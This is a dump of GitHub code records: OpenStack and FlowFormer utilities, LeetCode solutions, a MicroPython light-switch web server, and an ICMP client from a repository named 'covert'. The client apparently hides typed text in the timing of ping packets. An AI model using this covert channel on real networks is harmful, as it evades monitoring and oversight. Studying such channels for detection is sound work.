plugin/agent message queues.\n :param table: The table in question (NETWORK, SUBNET, PORT).\n :param operation: The operation that invokes notification (CREATE,\n DELETE, UPDATE)\n :returns: The topic name.\n \"\"\"\n return '%s-%s-%s' % (prefix, table, operation)\n","repo_name":"JiYou/openstack","sub_path":"packages/source/quantum/quantum/common/topics.py","file_name":"topics.py","file_ext":"py","file_size_in_byte":980,"program_lang":"python","lang":"en","doc_type":"code","stars":399,"dataset":"github-code","pt":"34"} +{"seq_id":"1911517355","text":"#!/usr/bin/env python\n\nfrom base import Icmp\nfrom transceive import *\nfrom helpers import *\nfrom impact import ImpactPacket\nimport threading\nimport time\nimport sys\n\n\nclass Client(Icmp):\n\n def __init__(this, src, dst):\n Icmp.__init__(this)\n this.src = src\n this.dst = dst\n this.dst = dst\n this.clock = 0.001\n this.word_wait = 0\n this.tx_done = threading.Condition(this.lock)\n this.sent_ack = None\n this.frame_replies = 0\n\n def start(this):\n PacketReceiver(this,ImpactPacket.ICMP.ICMP_ECHOREPLY).start()\n \n for i in xrange(this.measurement_packets):\n #exchange clock drift\n pkt = this.build_icmp(this.src, this.dst, icmp_type=ImpactPacket.ICMP().ICMP_ECHO, \\\n id=random.randint(0,1<<16), seq_num=1, data=this.create_time(now())+'/01234567')\n DelayedSender.send(this.sock, this.dst, pkt, 0)\n time.sleep(0.1)\n \n while True:\n this.send_buffer = raw_input(\"# \")\n this.send_buffer = this.send_buffer+'\\n'\n \n this.start_transmission()\n\n while True:\n this.send_next()\n with this.lock:\n if len(this.recv_buffer) != 0:\n w = this.recv_buffer\n this.recv_buffer = ''\n sys.stdout.write(w)\n if w[-1] == \"\\x00\":\n break\n \n def check_speed_up(this):\n if Icmp.check_speed_up(this) :\n this.clock = max(this.clock*0.9,0.0001)\n debug(\"# clock speedup %s\" % this.clock)\n\n def slow_down(this):\n Icmp.slow_down(this)\n this.clock = min(this.clock*1.1,0.4)\n debug(\"# clock slowdown %s\" % this.clock)\n time.sleep(this.clock+(this.delay/1000.0))\n\n def send_next(this):\n this.check_speed_up()\n\n this.frame_replies = 0\n seq = 1\n this.idn = this.in_idn = random.randint(0,1<<16)\n for b in n_bits(this.send_word, this.ppm_bits, this.transmission_len()):\n if(seq != 1):\n time.sleep(this.clock)\n\n debug(\"%s: sending %s at pos %s\" % (this.idn, b, this.code_nr(seq)))\n pkt = this.build_icmp(this.src, this.dst, icmp_type=ImpactPacket.ICMP().ICMP_ECHO, \\\n id=this.idn, seq_num=seq, data=this.create_time(now())+'/01234567')\n seq += 1\n DelayedSender.send(this.sock, this.dst, pkt, this.delay*b)\n\n with this.lock:\n this.sent_ack = None\n debug(\"finished sending packets, waiting for ack\")\n this.tx_done.wait(timeout=this.delay*this.ppm_bits*5/1000.0)\n\n if this.sent_ack == None :\n this.no_ack_reply()\n\n time.sleep(this.word_wait)\n\n def end_reception(this):\n with this.lock:\n w = this.decode_word(this.recv_word)\n debug(\"raw rcv_word %d\" % this.recv_word)\n this.recv_word = 0\n\n if w != False :\n this.ack(True);\n debug(\"reception correct, sending ack\")\n this.flush(w)\n else :\n if this.in_idn != None :\n this.ack(False);\n debug(\"error receiving packet, parity mismatch, sending nack\")\n this.slow_down()\n\n def ack(this,ok):\n this.sent_ack = ok\n pkt = this.build_icmp(this.src, this.dst, icmp_type=ImpactPacket.ICMP().ICMP_ECHO, \\\n id=this.idn, seq_num=this.seq_nr(this.transmission_len()), \\\n data=this.create_time(now())+'/01234567')\n DelayedSender.send(this.sock, this.dst, pkt, 0 if ok else this.delay)\n\n def no_ack_reply(this):\n with this.lock :\n this.retransmission()\n this.in_idn = None\n\n def receive(this, addr, pkt, ip):\n with this.lock :\n in_time = now()\n\n this.frame_replies += 1\n\n #the ack\n if this.frame_replies == this.transmission_len()+1 :\n off = (0 if this.sent_ack else this.delay)\n if this.decode(pkt, in_time, clock_offset=off, ack=True) :\n debug(\"got ack reply\")\n this.transmission_succ()\n else :\n debug(\"got nack reply\")\n this.retransmission()\n\n this.in_idn = None\n this.tx_done.notify()\n\n else :\n if this.in_idn != pkt.get_icmp_id():\n debug(\"got ack from server, but was too late..\")\n this.frame_replies -= 1\n return\n\n code = ppm_code(this.send_word, this.code_nr(pkt.get_icmp_seq()), this.ppm_bits)\n off = code * this.delay\n \n this.decode(pkt, in_time, clock_offset=off)\n\n #last bit received, sending ack\n if this.frame_replies == this.transmission_len() :\n # make sure we do not change sent_ack before main thread is ready\n # to wait for the ack\n this.end_reception()\n\n def __str__(this):\n return 'client'\n","repo_name":"o-/covert","sub_path":"icmp/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":5249,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"9272801969","text":"from machine import Pin\nimport socket\n\nimport _thread\nimport time\nimport utime\nimport machine\n#import wifiLightSwitch.uftpd\n\n### quick fix for crash\nf = open('log.log', 'w')\nf.write('')\nf.close()\n\ndef resetSwitch(a):\n logToFile('restarting')\n machine.reset()\n\ndef startResetTimer():\n timer = machine.Timer(0)\n #86400 seconds in a day\n timer.init(period=86400000, mode=machine.Timer.PERIODIC, callback=resetSwitch)\n \ndef logToFile(s):\n old = ''\n try:\n f = open('log.log', 'r')\n old = f.read()\n f.close()\n except Exception as e:\n print('EXCEPTION: log most likely not created yet, attempting to create')\n print(e)\n f = open('log.log', 'w')\n f.write(old)\n f.write('\\n')\n f.write(s)\n f.close()\n\ndef getLog():\n l = ''\n try:\n f = open('log.log')\n l = f.read()\n f.close()\n except Exception as e:\n print('Exception getting log: ', e)\n f.close()\n l = 'no log exists'\n if l == '':\n l = 'no log exists'\n return l\n \n \n\ndef clearLog():\n f = open('log.log', 'w')\n f.write('')\n f.close()\n \ndef logException(e):\n import sys\n logToFile(str(sys.print_exception(e)))\n sys.print_exception(e)\n \n\nclass Switch:\n def __init__(self, name, relayPinNumber, switchPinNumber, defaultShutOffTimer=15):\n self.name = name\n self.relayPin = Pin(relayPinNumber, Pin.OUT)\n self.switchPin = Pin(switchPinNumber, Pin.IN, Pin.PULL_DOWN)\n self.pysicalSwitchState = self.switchPin.value()\n self.shutOffTimer = machine.Timer(1) \n self.shutOffTime = defaultShutOffTimer * 60000 #60000 = minute\n #self.adc = machine.ADC(self.switchPin)\n print('Switch created!')\n print('Name: ', name)\n\n def toggle(self):\n if self.relayPin.value() == 0:\n self.relayPin.value(1)\n self.stopTimer()\n return self.name + \" OFF: \" + str(self.relayPin.value())\n else:\n self.relayPin.value(0)\n self.stopTimer()\n self.startTimer()\n return self.name + \" ON: \" + str(self.relayPin.value())\n #getState gets the on / off state of the light\n def getState(self):\n state = 'ON: ' + str(self.relayPin.value())\n if self.relayPin.value() == 1:\n state = 'OFF: ' + str(self.relayPin.value())\n return state\n\n #analogGraph reads the ADC value, calculates it to a 3.3v scale and makes a crude bar graph\n def analogGraph(self):\n v = int((self.adc.read() / 4095) * 50)\n x = 0\n bar = str((v / 50) * 3.3) + ' '\n while x <= v:\n x = x + 1\n bar = bar + 'X'\n return bar\n #getTimer get the current state of the shut off timer\n def getTimer(self):\n return self.shutOffTimer\n\n #startTimer starts the shutOffTimer\n def startTimer(self):\n self.shutOffTimer.init(period=self.shutOffTime, mode=machine.Timer.ONE_SHOT, callback=self.turnLightOff)\n \n #stopTimer shuts the shut off timer off\n def stopTimer(self):\n self.shutOffTimer.deinit()\n\n\n #setTimer sets the shut off timer\n def setTimer(self, timer):\n #60000 = minute\n self.shutOffTime = (60000 * timer)\n self.stopTimer()\n self.startTimer()\n return str(self.shutOffTime)\n \n #turnLightOff is used with a timer to make sure the light shuts off\n def turnLightOff(self, a):\n print('shut off timer fired')\n if self.relayPin.value() == 0:\n print('shutting light off')\n self.toggle()\n else:\n print('the light was off already')\n \ndef watchPysicalSwitch(s):\n while True:\n state = s.switchPin.value() \n if state != s.pysicalSwitchState:\n s.pysicalSwitchState = state\n logToFile('pysical state set to: ' + str(state))\n s.toggle()\n time.sleep(0.4)\n \ndef watchPysicalSwitches(switches):\n logToFile('watching sweitches:')\n for s in switches:\n logToFile(s.name())\n while True:\n for s in switches:\n state = s.switchPin.value()\n if state != s.pysicalSwitchState:\n s.pysicalSwitchState = state\n logToFile('pysical state set to: ', state)\n s.toggle()\n time.sleep(0.5)\n \n \n time.sleep(0.5)\n\ndef web_page():\n htmlFile = open(\"wifiLightSwitch/index.html\", \"r\")\n html = htmlFile.read()\n htmlFile.close()\n return html\n\ndef sendHTTP(conn, response):\n conn.send('HTTP/1.1 200 OK\\n')\n conn.send('Content-Type: text/html\\n')\n conn.send('Access-Control-Allow-Origin: *')\n conn.send('Connection: close\\n\\n')\n conn.sendall(response)\n conn.close()\n\ndef run():\n \n logToFile('RUN starting')\n startResetTimer()\n switches = []\n switch = Switch('Storage Room', 13, 36)\n switches.append(switch)\n _thread.start_new_thread(watchPysicalSwitch, ( switches))\n \n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.bind(('', 8080))\n s.listen(5)\n\n while True:\n conn, addr = s.accept()\n try:\n response = ''\n request = str(conn.recv(1024))\n \n line1On = request.find('/?line1=on')\n servLog = request.find('/log')\n reset = request.find('/resetSwitch')\n getStateHandler = request.find('/getState')\n getTimerHandler = request.find('/getTimer')\n setTimerHandler = request.find('/setTimer')\n clearLogHandler = request.find('/clearLog')\n if line1On == 6:\n response = switch.toggle()\n logToFile('line 1 toggle recieved')\n sendHTTP(conn, response)\n elif servLog == 6:\n response = getLog()\n sendHTTP(conn, response)\n elif getStateHandler == 6:\n response = switch.getState()\n sendHTTP(conn, response)\n elif reset == 6:\n logToFile('reset request recieved')\n response = 'resetting'\n sendHTTP(conn, response)\n resetSwitch(1)\n elif getTimerHandler == 6:\n logToFile('getting timer: ')\n response = switch.getTimer()\n logToFile(response)\n sendHTTP(conn, response)\n elif setTimerHandler == 6:\n logToFile('setting timer: ')\n response = switch.setTimer(int(request[setTimerHandler+9:request.find(' HTTP')]))\n logToFile(response)\n sendHTTP(conn, response)\n elif clearLogHandler == 6:\n clearLog()\n sendHTTP(conn, 'log cleared')\n else:\n response = web_page()\n sendHTTP(conn, response)\n \n except Exception as e:\n logException(e)\n conn.close()\n \n \n \n","repo_name":"OperationAzura/wifiLightSwitch","sub_path":"wifiLightSwitch/wifiLightSwitchMain.py","file_name":"wifiLightSwitchMain.py","file_ext":"py","file_size_in_byte":7037,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26585225063","text":"# 107 - https://leetcode.com/problems/binary-tree-level-order-traversal-ii/\n\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def levelOrderBottom(self, root: TreeNode) -> List[List[int]]:\n if root is None:\n return\n \n queue = [root]\n result = []\n \n while queue:\n len_q = len(queue)\n list_level = []\n while len_q > 0:\n curr = queue.pop(0)\n len_q -= 1\n list_level.append(curr.val)\n if curr.left:\n queue.append(curr.left)\n if curr.right:\n queue.append(curr.right)\n result.append(list_level)\n \n return result[-1::-1]\n\n'''\nspace complexity --> O(1) --> considering output levels array will always be there in any kind of solution, and level and queue will never go to n level and will always be comparativly small.\n -- also, it could be O(n) --> if we consider output array space in this calculation, the O(n+k), where n is number of nodes and k is maxinum size of queue.\ntime complexity --> O(n) --> because of upper while loop, inner while loop in only 'k' times which is maximum number of node at any given level.\n''' \n","repo_name":"neeraj-somani/Python_Algos","sub_path":"Leetcode-Problems/62-107-BinaryTreeLevelOrderTraversal-II.py","file_name":"62-107-BinaryTreeLevelOrderTraversal-II.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"21365237025","text":"import numpy as np\nimport torch\nimport torch.utils.data as data\nimport torch.nn.functional as F\n\nimport os\nimport math\nimport random\nfrom glob import glob\nimport os.path as osp\n\nfrom utils import frame_utils\nfrom utils.augmentor import FlowAugmentor, SparseFlowAugmentor\n#from utils import flow_transforms \n\nfrom torchvision.utils import save_image\n\nfrom utils import flow_viz\nimport cv2\nfrom utils.utils import coords_grid, bilinear_sampler\n\nclass FlowDataset(data.Dataset):\n def __init__(self, aug_params=None, sparse=False):\n self.augmentor = None\n self.sparse = sparse\n\n if aug_params is not None:\n if sparse:\n self.augmentor = SparseFlowAugmentor(**aug_params)\n else:\n self.augmentor = FlowAugmentor(**aug_params)\n\n self.is_test = False\n self.init_seed = False\n self.flow_list = []\n self.image_list = []\n self.extra_info = []\n\n def __getitem__(self, index):\n #print(self.flow_list[index])\n if self.is_test:\n img1 = frame_utils.read_gen(self.image_list[index][0], test=self.is_test)\n img2 = frame_utils.read_gen(self.image_list[index][1], test=self.is_test)\n img1 = np.array(img1).astype(np.uint8)[..., :3]\n img2 = np.array(img2).astype(np.uint8)[..., :3]\n img1 = torch.from_numpy(img1).permute(2, 0, 1).float()\n img2 = torch.from_numpy(img2).permute(2, 0, 1).float()\n return img1, img2, self.extra_info[index]\n\n if not self.init_seed:\n worker_info = torch.utils.data.get_worker_info()\n if worker_info is not None:\n torch.manual_seed(worker_info.id)\n np.random.seed(worker_info.id)\n random.seed(worker_info.id)\n self.init_seed = True\n\n index = index % len(self.image_list)\n valid = None\n if self.sparse:\n flow, valid = frame_utils.readFlowKITTI(self.flow_list[index])\n else:\n flow = frame_utils.read_gen(self.flow_list[index])\n\n img1 = frame_utils.read_gen(self.image_list[index][0])\n img2 = frame_utils.read_gen(self.image_list[index][1])\n \n flow = np.array(flow).astype(np.float32)\n img1 = np.array(img1).astype(np.uint8)\n img2 = np.array(img2).astype(np.uint8)\n # grayscale images\n if len(img1.shape) == 2:\n img1 = np.tile(img1[...,None], (1, 1, 3))\n img2 = np.tile(img2[...,None], (1, 1, 3))\n else:\n img1 = img1[..., :3]\n img2 = img2[..., :3]\n\n if self.augmentor is not None:\n if self.sparse:\n img1, img2, flow, valid = self.augmentor(img1, img2, flow, valid)\n else:\n img1, img2, flow = self.augmentor(img1, img2, flow)\n\n img1 = torch.from_numpy(img1).permute(2, 0, 1).float()\n img2 = torch.from_numpy(img2).permute(2, 0, 1).float()\n flow = torch.from_numpy(flow).permute(2, 0, 1).float()\n\n if valid is not None:\n valid = torch.from_numpy(valid)\n else:\n valid = (flow[0].abs() < 1000) & (flow[1].abs() < 1000)\n return img1, img2, flow, valid.float()\n\n\n def __rmul__(self, v):\n self.flow_list = v * self.flow_list\n self.image_list = v * self.image_list\n return self\n \n def __len__(self):\n return len(self.image_list)\n\nclass MpiSintel_submission(FlowDataset):\n def __init__(self, aug_params=None, split='test', root='datasets/Sintel', dstype='clean'):\n super(MpiSintel_submission, self).__init__(aug_params)\n flow_root = osp.join(root, split, 'flow')\n image_root = osp.join(root, split, dstype)\n\n if split == 'test':\n self.is_test = True\n\n for scene in os.listdir(image_root):\n image_list = sorted(glob(osp.join(image_root, scene, '*.png')))\n for i in range(len(image_list)-1):\n self.image_list += [ [image_list[i], image_list[i+1]] ]\n self.extra_info += [ (scene, i) ] # scene and frame_id\n\n if split != 'test':\n self.flow_list += sorted(glob(osp.join(flow_root, scene, '*.flo')))\n\nclass MpiSintel(FlowDataset):\n def __init__(self, aug_params=None, split='training', root='datasets/Sintel', dstype='clean'):\n super(MpiSintel, self).__init__(aug_params)\n\n root = 's3://'\n\n self.image_list = []\n with open(\"./flow_dataset/Sintel/Sintel_\"+dstype+\"_png.txt\") as f:\n images = f.readlines()\n for img1, img2 in zip(images[0::2], images[1::2]):\n self.image_list.append([root+img1.strip(), root+img2.strip()])\n \n self.flow_list = []\n with open(\"./flow_dataset/Sintel/Sintel_\"+dstype+\"_flo.txt\") as f:\n flows = f.readlines()\n for flow in flows:\n self.flow_list.append(root+flow.strip())\n \n assert (len(self.image_list) == len(self.flow_list))\n\n self.extra_info = []\n with open(\"./flow_dataset/Sintel/Sintel_\"+dstype+\"_extra_info.txt\") as f:\n info = f.readlines()\n for scene, id in zip(info[0::2], info[1::2]):\n self.extra_info.append((scene.strip(), int(id.strip())))\n # flow_root = osp.join(root, split, 'flow')\n # image_root = osp.join(root, split, dstype)\n\n # if split == 'test':\n # self.is_test = True\n\n # for scene in os.listdir(image_root):\n # image_list = sorted(glob(osp.join(image_root, scene, '*.png')))\n # for i in range(len(image_list)-1):\n # self.image_list += [ [image_list[i], image_list[i+1]] ]\n # self.extra_info += [ (scene, i) ] # scene and frame_id\n\n # if split != 'test':\n # self.flow_list += sorted(glob(osp.join(flow_root, scene, '*.flo')))\n\n\nclass FlyingChairs(FlowDataset):\n def __init__(self, aug_params=None, split='train', root='datasets/FlyingChairs_release/data'):\n super(FlyingChairs, self).__init__(aug_params)\n\n root = 's3://'\n\n with open(\"./flow_dataset/flying_chairs/flyingchairs_ppm.txt\") as f:\n images = f.readlines()\n images = [root+img.strip() for img in images]\n with open(\"./flow_dataset/flying_chairs/flyingchairs_flo.txt\") as f:\n flows = f.readlines()\n flows = [root+flo.strip() for flo in flows]\n \n # images = sorted(glob(osp.join(root, '*.ppm')))\n # flows = sorted(glob(osp.join(root, '*.flo')))\n assert (len(images)//2 == len(flows))\n\n split_list = np.loadtxt('chairs_split.txt', dtype=np.int32)\n for i in range(len(flows)):\n xid = split_list[i]\n if (split=='training' and xid==1) or (split=='validation' and xid==2):\n self.flow_list += [ flows[i] ]\n self.image_list += [ [images[2*i], images[2*i+1]] ]\n\n\nclass FlyingThings3D(FlowDataset):\n def __init__(self, aug_params=None, root='datasets/FlyingThings3D', dstype='frames_cleanpass'):\n super(FlyingThings3D, self).__init__(aug_params)\n\n root = 's3://'\n\n self.image_list = []\n with open(\"./flow_dataset/flying_things/flyingthings_\"+dstype+\"_png.txt\") as f:\n images = f.readlines()\n for img1, img2 in zip(images[0::2], images[1::2]):\n self.image_list.append([root+img1.strip(), root+img2.strip()])\n self.flow_list = []\n with open(\"./flow_dataset/flying_things/flyingthings_\"+dstype+\"_pfm.txt\") as f:\n flows = f.readlines()\n for flow in flows:\n self.flow_list.append(root+flow.strip())\n\n # for cam in ['left']:\n # for direction in ['into_future', 'into_past']:\n # image_dirs = sorted(glob(osp.join(root, dstype, 'TRAIN/*/*')))\n # image_dirs = sorted([osp.join(f, cam) for f in image_dirs])\n\n # flow_dirs = sorted(glob(osp.join(root, 'optical_flow/TRAIN/*/*')))\n # flow_dirs = sorted([osp.join(f, direction, cam) for f in flow_dirs])\n\n # for idir, fdir in zip(image_dirs, flow_dirs):\n # images = sorted(glob(osp.join(idir, '*.png')) )\n # flows = sorted(glob(osp.join(fdir, '*.pfm')) )\n # for i in range(len(flows)-1):\n # if direction == 'into_future':\n # self.image_list += [ [images[i], images[i+1]] ]\n # self.flow_list += [ flows[i] ]\n # elif direction == 'into_past':\n # self.image_list += [ [images[i+1], images[i]] ]\n # self.flow_list += [ flows[i+1] ]\n \n\nclass KITTI(FlowDataset):\n def __init__(self, aug_params=None, split='training', root='datasets/KITTI'):\n super(KITTI, self).__init__(aug_params, sparse=True)\n if split == 'testing':\n self.is_test = True\n\n root = 's3://'\n\n self.image_list = []\n with open(\"./flow_dataset/KITTI/KITTI_{}_image.txt\".format(split)) as f:\n images = f.readlines()\n for img1, img2 in zip(images[0::2], images[1::2]):\n self.image_list.append([root+img1.strip(), root+img2.strip()])\n\n self.extra_info = []\n with open(\"./flow_dataset/KITTI/KITTI_{}_extra_info.txt\".format(split)) as f:\n info = f.readlines()\n for id in info:\n self.extra_info.append([id.strip()])\n\n if split == \"training\":\n self.flow_list = []\n with open(\"./flow_dataset/KITTI/KITTI_{}_flow.txt\".format(split)) as f:\n flow = f.readlines()\n for flo in flow:\n self.flow_list.append(root+flo.strip())\n # root = osp.join(root, split)\n # images1 = sorted(glob(osp.join(root, 'image_2/*_10.png')))\n # images2 = sorted(glob(osp.join(root, 'image_2/*_11.png')))\n\n # for img1, img2 in zip(images1, images2):\n # frame_id = img1.split('/')[-1]\n # self.extra_info += [ [frame_id] ]\n # self.image_list += [ [img1, img2] ]\n\n # if split == 'training':\n # self.flow_list = sorted(glob(osp.join(root, 'flow_occ/*_10.png')))\n\nclass AutoFlow(data.Dataset):\n def __init__(self, num_steps, crop_size, log_dir, root='datasets/'):\n super(AutoFlow, self).__init__()\n\n root = 's3://'\n self.image_list = []\n with open(\"./flow_dataset/AutoFlow/AutoFlow_image.txt\") as f:\n images = f.readlines()\n for img1, img2 in zip(images[0::2], images[1::2]):\n self.image_list.append([root+img1.strip(), root+img2.strip()])\n self.flow_list = []\n with open(\"./flow_dataset/AutoFlow/AutoFlow_flow.txt\") as f:\n flows = f.readlines()\n for flow in flows:\n self.flow_list.append(root+flow.strip())\n \n self.crop_size = crop_size\n self.log_dir = log_dir\n self.num_steps = num_steps\n self.scale = 1\n self.order = 1\n self.black = False\n self.noise = 0\n self.is_test = False\n self.init_seed = False\n\n self.iter_counts = 0\n\n def __rmul__(self, v):\n self.flow_list = v * self.flow_list\n self.image_list = v * self.image_list\n return self\n \n def __len__(self):\n return len(self.image_list) * 100\n \n def __getitem__(self, index):\n #print(self.flow_list[index])\n if self.is_test:\n img1 = frame_utils.read_gen(self.image_list[index][0], test=self.is_test)\n img2 = frame_utils.read_gen(self.image_list[index][1], test=self.is_test)\n img1 = np.array(img1).astype(np.uint8)[..., :3]\n img2 = np.array(img2).astype(np.uint8)[..., :3]\n img1 = torch.from_numpy(img1).permute(2, 0, 1).float()\n img2 = torch.from_numpy(img2).permute(2, 0, 1).float()\n return img1, img2, self.extra_info[index]\n\n if not self.init_seed:\n worker_info = torch.utils.data.get_worker_info()\n if worker_info is not None:\n torch.manual_seed(worker_info.id)\n np.random.seed(worker_info.id)\n random.seed(worker_info.id)\n self.init_seed = True\n index = index % len(self.image_list)\n valid = None\n \n flow = frame_utils.read_gen(self.flow_list[index])\n\n img1 = frame_utils.read_gen(self.image_list[index][0])\n img2 = frame_utils.read_gen(self.image_list[index][1])\n \n flow = np.array(flow).astype(np.float32)\n # For PWC-style augmentation, pixel values are in [0, 1]\n img1 = np.array(img1).astype(np.uint8) / 255.0\n img2 = np.array(img2).astype(np.uint8) / 255.0\n\n # grayscale images\n if len(img1.shape) == 2:\n img1 = np.tile(img1[...,None], (1, 1, 3))\n img2 = np.tile(img2[...,None], (1, 1, 3))\n else:\n img1 = img1[..., :3]\n img2 = img2[..., :3]\n \n iter_counts = self.iter_counts\n self.iter_counts = self.iter_counts + 1\n print(self.iter_counts)\n th, tw = self.crop_size\n schedule = [0.5, 1., self.num_steps] # initial coeff, final_coeff, half life\n schedule_coeff = schedule[0] + (schedule[1] - schedule[0]) * \\\n (2/(1+np.exp(-1.0986*iter_counts/schedule[2])) - 1)\n \n co_transform = flow_transforms.Compose([\n flow_transforms.Scale(self.scale, order=self.order),\n flow_transforms.SpatialAug([th,tw],scale=[0.4,0.03,0.2],\n rot=[0.4,0.03],\n trans=[0.4,0.03],\n squeeze=[0.3,0.], schedule_coeff=schedule_coeff, order=self.order, black=self.black),\n flow_transforms.PCAAug(schedule_coeff=schedule_coeff),\n flow_transforms.ChromaticAug( schedule_coeff=schedule_coeff, noise=self.noise),\n ])\n \n flow = np.concatenate([flow, np.ones((flow.shape[0], flow.shape[1], 1))], axis=-1)\n augmented, flow_valid = co_transform([img1, img2], flow)\n flow = flow_valid[:,:,:2]\n valid = flow_valid[:,:,2:3]\n\n img1 = augmented[0]\n img2 = augmented[1]\n if np.random.binomial(1,0.5):\n #sx = int(np.random.uniform(25,100))\n #sy = int(np.random.uniform(25,100))\n sx = int(np.random.uniform(50,125))\n sy = int(np.random.uniform(50,125))\n #sx = int(np.random.uniform(50,150))\n #sy = int(np.random.uniform(50,150))\n cx = int(np.random.uniform(sx,img2.shape[0]-sx))\n cy = int(np.random.uniform(sy,img2.shape[1]-sy))\n img2[cx-sx:cx+sx,cy-sy:cy+sy] = np.mean(np.mean(img2,0),0)[np.newaxis,np.newaxis]\n\n\n img1 = torch.from_numpy(img1).permute(2, 0, 1).float()\n img2 = torch.from_numpy(img2).permute(2, 0, 1).float()\n flow = torch.from_numpy(flow).permute(2, 0, 1).float()\n \n\n if valid is not None:\n valid = torch.from_numpy(valid).permute(2, 0, 1).float()\n valid = valid[0]\n else:\n valid = (flow[0].abs() < 1000) & (flow[1].abs() < 1000)\n\n return img1 * 255, img2 * 255, flow, valid.float()\n\n \n \n\n\nclass HD1K(FlowDataset):\n def __init__(self, aug_params=None, root='datasets/HD1k'):\n super(HD1K, self).__init__(aug_params, sparse=True)\n\n root = 's3://'\n self.image_list = []\n with open(\"./flow_dataset/HD1K/HD1K_image.txt\") as f:\n images = f.readlines()\n for img1, img2 in zip(images[0::2], images[1::2]):\n self.image_list.append([root+img1.strip(), root+img2.strip()])\n self.flow_list = []\n with open(\"./flow_dataset/HD1K/HD1K_flow.txt\") as f:\n flows = f.readlines()\n for flow in flows:\n self.flow_list.append(root+flow.strip())\n\n # seq_ix = 0\n # while 1:\n # flows = sorted(glob(os.path.join(root, 'hd1k_flow_gt', 'flow_occ/%06d_*.png' % seq_ix)))\n # images = sorted(glob(os.path.join(root, 'hd1k_input', 'image_2/%06d_*.png' % seq_ix)))\n\n # if len(flows) == 0:\n # break\n\n # for i in range(len(flows)-1):\n # self.flow_list += [flows[i]]\n # self.image_list += [ [images[i], images[i+1]] ]\n\n # seq_ix += 1\n\n\n\ndef fetch_dataloader(args, TRAIN_DS='C+T+K+S+H'):\n \"\"\" Create the data loader for the corresponding trainign set \"\"\"\n\n if args.stage == 'chairs':\n if hasattr(args.percostformer, 'pwc_aug') and args.percostformer.pwc_aug:\n aug_params = {'crop_size': args.image_size, 'min_scale': -0.1, 'max_scale': 1.0, 'do_flip': True, 'pwc_aug': True}\n else:\n aug_params = {'crop_size': args.image_size, 'min_scale': -0.1, 'max_scale': 1.0, 'do_flip': True}\n train_dataset = FlyingChairs(aug_params, split='training')\n \n elif args.stage == 'things':\n aug_params = {'crop_size': args.image_size, 'min_scale': -0.4, 'max_scale': 0.8, 'do_flip': True}\n clean_dataset = FlyingThings3D(aug_params, dstype='frames_cleanpass')\n final_dataset = FlyingThings3D(aug_params, dstype='frames_finalpass')\n train_dataset = clean_dataset + final_dataset\n\n elif args.stage == 'sintel':\n aug_params = {'crop_size': args.image_size, 'min_scale': -0.2, 'max_scale': 0.6, 'do_flip': True}\n things = FlyingThings3D(aug_params, dstype='frames_cleanpass')\n sintel_clean = MpiSintel(aug_params, split='training', dstype='clean')\n sintel_final = MpiSintel(aug_params, split='training', dstype='final') \n\n if TRAIN_DS == 'C+T+K+S+H':\n kitti = KITTI({'crop_size': args.image_size, 'min_scale': -0.3, 'max_scale': 0.5, 'do_flip': True})\n hd1k = HD1K({'crop_size': args.image_size, 'min_scale': -0.5, 'max_scale': 0.2, 'do_flip': True})\n train_dataset = 100*sintel_clean + 100*sintel_final + 200*kitti + 5*hd1k + things\n\n elif TRAIN_DS == 'C+T+K/S':\n train_dataset = 100*sintel_clean + 100*sintel_final + things\n\n elif args.stage == 'kitti':\n aug_params = {'crop_size': args.image_size, 'min_scale': -0.2, 'max_scale': 0.4, 'do_flip': False}\n train_dataset = KITTI(aug_params, split='training')\n\n elif args.stage == 'autoflow-pwcaug':\n aug_params = {'num_steps': args.trainer.num_steps, 'crop_size': args.image_size, 'log_dir': args.log_dir}\n train_dataset = AutoFlow(**aug_params)\n\n train_loader = data.DataLoader(train_dataset, batch_size=args.batch_size, \n pin_memory=False, shuffle=True, num_workers=args.batch_size, drop_last=True)\n\n print('Training with %d image pairs' % len(train_dataset))\n return train_loader\n\nif __name__ == \"__main__\":\n aug_params = {'crop_size': [400, 720], 'min_scale': -0.2, 'max_scale': 0, 'do_flip': True}\n aug_params['min_scale'] = -0.2\n aug_params['min_stretch'] = -0.2\n sintel_clean = MpiSintel(aug_params, split='training', dstype='clean')\n\n train_loader = data.DataLoader(sintel_clean, batch_size=1, \n pin_memory=False, shuffle=True, num_workers=1, drop_last=True)\n\n for i_batch, data_blob in enumerate(train_loader):\n image1, image2, flow, valid = [x for x in data_blob]\n print(i_batch, image1.shape)\n \n\n \n\n # if i_batch==5:\n # exit()\n \n \n","repo_name":"drinkingcoder/FlowFormer-Official","sub_path":"core/utils/datasets.py","file_name":"datasets.py","file_ext":"py","file_size_in_byte":19642,"program_lang":"python","lang":"en","doc_type":"code","stars":343,"dataset":"github-code","pt":"34"} +{"seq_id":"8803475022","text":"from typing import List\n\n\nclass Solution:\n def wiggleMaxLength(self, nums: List[int]) -> int:\n up, down = 1, 1\n for i in range(1, len(nums)):\n if nums[i] > nums[i - 1]:\n up = down + 1\n if nums[i] < nums[i - 1]:\n down = up + 1\n return 0 if 0 == len(nums) else max(up, down)\n\n\nif __name__ == \"__main__\":\n solution = Solution()\n result = solution.wiggleMaxLength(nums=[1, 7, 4, 9, 2, 5])\n print(result)\n","repo_name":"chinesezyc/leetcode","sub_path":"动态规划/376. 摆动序列.py","file_name":"376. 摆动序列.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"32172693961","text":"import numpy as np\nfrom numpy import ndarray\nfrom pathlib import Path\nfrom torch.utils.data import Dataset\nfrom typing import Any, Callable, Tuple\nfrom urllib import request\n\n\nclass Dsprites(Dataset):\n URL = (\n \"https://github.com/deepmind/dsprites-dataset/raw/master/\"\n \"dsprites_ndarray_co1sh3sc6or40x32y32_64x64.npz\"\n )\n\n def __init__(\n self,\n file_name: str = \"/tmp/dsprites.npz\",\n transform: Callable[[ndarray], Any] = lambda x: x,\n ) -> None:\n path = Path(file_name)\n assert path.suffix == \".npz\", \"Dsprites file name muse be end with .npz\"\n if not 